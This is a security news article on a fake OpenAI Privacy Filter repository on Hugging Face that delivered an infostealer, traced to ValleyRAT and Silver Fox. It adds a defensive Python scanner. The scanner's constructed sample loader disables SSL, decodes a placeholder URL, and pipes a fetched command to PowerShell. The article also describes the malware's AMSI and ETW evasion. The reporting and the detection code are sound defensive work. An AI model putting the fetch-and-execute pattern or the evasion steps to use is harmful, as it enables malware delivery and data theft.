A fake OpenAI repository on Hugging Face reached the number one trending position on the platform, collecting roughly 244,000 downloads and 667 likes within 18 hours before authorities pulled the plug.
The project, Open-OSS/privacy-filter, copied OpenAI’s legitimate Privacy Filter model almost word-for-word, including the full model description, to trick users into downloading it. Hugging Face has since disabled access to the malicious repository.
OpenAI released Privacy Filter in April 2026. The tool detects and strips personally identifiable information (PII) from unstructured text, and the company built it to help developers embed stronger privacy protections inside their applications. Criminals treated the launch as an opening.
OpenAI has faced other privacy-related challenges recently. Italy banned ChatGPT over privacy concerns, highlighting how governments are scrutinizing AI platforms for their data handling practices.
Hackers buried malware inside a fake model setup
The fraudulent repository directed users to clone it and run a batch script (“start.bat”) on Windows, or a Python script (“loader.py”) on Linux and macOS, to configure dependencies and start the model.
The Python script then quietly disabled SSL verification, decoded a Base64-encoded URL from a public JSON paste service called JSON Keeper, and used it to pull a command that it passed directly to PowerShell.
The HiddenLayer Research Team, which uncovered the scheme, noted that routing payloads through JSON Keeper gave the attackers the ability to swap out malicious files at any time without touching the repository itself.
PowerShell then fetched a batch script from a remote server, “api.eth-fastscan[.]org”, and executed it. That batch script acted as a second-stage downloader.
It elevated its own privileges through a User Account Control (UAC) prompt, added itself to Microsoft Defender’s exclusion list, pulled the next payload from the same domain, and created a scheduled task to run the final executable.
According to HiddenLayer, the task served as a one-shot system-level launcher with no persistence across reboots, and the malware deleted itself two seconds after firing.
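As an added defensive example (not code from HiddenLayer or from the article), the scanner below parses a downloaded loader script with Python's ast module and flags the three behaviours described above: SSL verification switched off, a Base64-decoded URL, and a command handed to PowerShell. The sample loader is constructed with an inert placeholder URL, and fetch_text is a hypothetical stand-in for the download step.

```python
import ast, base64, re

# Constructed sample, not the real loader: just the behaviours the article
# describes, with an inert placeholder URL so the scanner has input to flag.
SAMPLE_LOADER = '''
import ssl, base64, subprocess
ssl._create_default_https_context = ssl._create_unverified_context
paste = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcGFzdGU=").decode()
cmd = fetch_text(paste)  # stand-in for the download from the paste service
subprocess.run(["powershell", "-Command", cmd])
'''
SHELL_NAMES = {"powershell", "pwsh", "cmd", "bash", "sh"}

def _spawns_shell(call: ast.Call) -> bool:
    """True if a string literal inside the call names a shell, or shell=True."""
    literals = {n.value.lower().removesuffix(".exe") for n in ast.walk(call)
                if isinstance(n, ast.Constant) and isinstance(n.value, str)}
    shell_kw = any(k.arg == "shell" and getattr(k.value, "value", None) is True
                   for k in call.keywords)
    return shell_kw or bool(SHELL_NAMES & literals)

def scan_loader(source: str) -> list[str]:
    """Return the sorted set of indicator names found in a loader's source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        # ssl._create_default_https_context = ssl._create_unverified_context
        if isinstance(node, ast.Assign) and \
                ast.unparse(node.value).endswith("_create_unverified_context"):
            findings.add("ssl-verification-disabled")
        if not isinstance(node, ast.Call):
            continue
        name = ast.unparse(node.func)
        if name.endswith("b64decode"):
            findings.add("base64-decoded-value")
            for arg in node.args:  # reveal a URL hidden in a base64 literal
                if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                    try:
                        decoded = base64.b64decode(arg.value).decode()
                    except Exception:
                        continue
                    if re.match(r"https?://", decoded):
                        findings.add("base64-url:" + decoded)
        if name.startswith(("subprocess.", "os.system", "os.popen")) \
                and _spawns_shell(node):
            findings.add("shell-spawned")
        if any(k.arg == "verify" and getattr(k.value, "value", 1) is False
               for k in node.keywords):  # e.g. requests.get(url, verify=False)
            findings.add("ssl-verification-disabled")
    return sorted(findings)
```

Running scan_loader over every .py file in a cloned model repository before executing any of them turns the article's description into a pre-run check; any hit on "shell-spawned" together with a decoded URL is reason to stop and inspect.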
The final payload was a fully equipped information stealer. It captured screenshots and collected data from virtual-asset wallets and browser extensions, Discord, system metadata, FileZilla configurations, seed phrases for digital wallets, and browsing history from both Chromium- and Gecko-based browsers.
The stealer also scanned for debuggers, sandboxes, and virtual machines before disabling Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) to slip past behavioral detection. All stolen data left the machine in JSON format, heading to the domain “recargapopular[.]com.”
Researchers suspect the download and like counts were artificially inflated to manufacture the appearance of trust and push more users toward downloading the repository.
Six more infected repositories surface
HiddenLayer’s investigation turned up six additional Hugging Face repositories carrying the same Python loader, all published under an account named “anthfu.” The repositories used names mimicking popular AI models, including fake versions of DeepSeek, Qwen, and Gemma. According to HiddenLayer, the shared infrastructure across these repositories points to a coordinated supply chain operation targeting open-source platforms broadly.
The same server domain also delivered a separate Windows executable that connected to a command-and-control server researchers had previously tied to a malicious npm package called “trevlo.”
The trail leads back to ValleyRAT and Silver Fox
The trevlo package appeared on npm on April 4, 2026, under a user named “titaniumg” and accumulated more than 2,300 downloads before its removal. Researchers at Panther found that the package’s postinstall hook silently executed an obfuscated JavaScript loader.
That loader spawned a Base64-encoded PowerShell command, which fetched and ran a second-stage script from attacker-controlled infrastructure. The script then downloaded a Winos 4.0 stager binary, complete with Zone.Identifier removal, hidden-window execution, and process detachment.
Winos 4.0 is the same malware that security researchers track as ValleyRAT, a modular remote access trojan that analysts attribute exclusively to a Chinese threat group called Silver Fox. The group typically spreads ValleyRAT through phishing emails and SEO poisoning tactics. Using a Hugging Face repository as the entry point marks a new initial access method for this group.
Security researchers have become prime targets for these operations. Fake GitHub exploits have been delivering WebRAT malware specifically to researchers, suggesting threat actors see them as valuable entry points into larger networks.
According to HiddenLayer, the infrastructure overlap across these campaigns suggests they are likely connected and part of a wider operation focusing on open-source systems.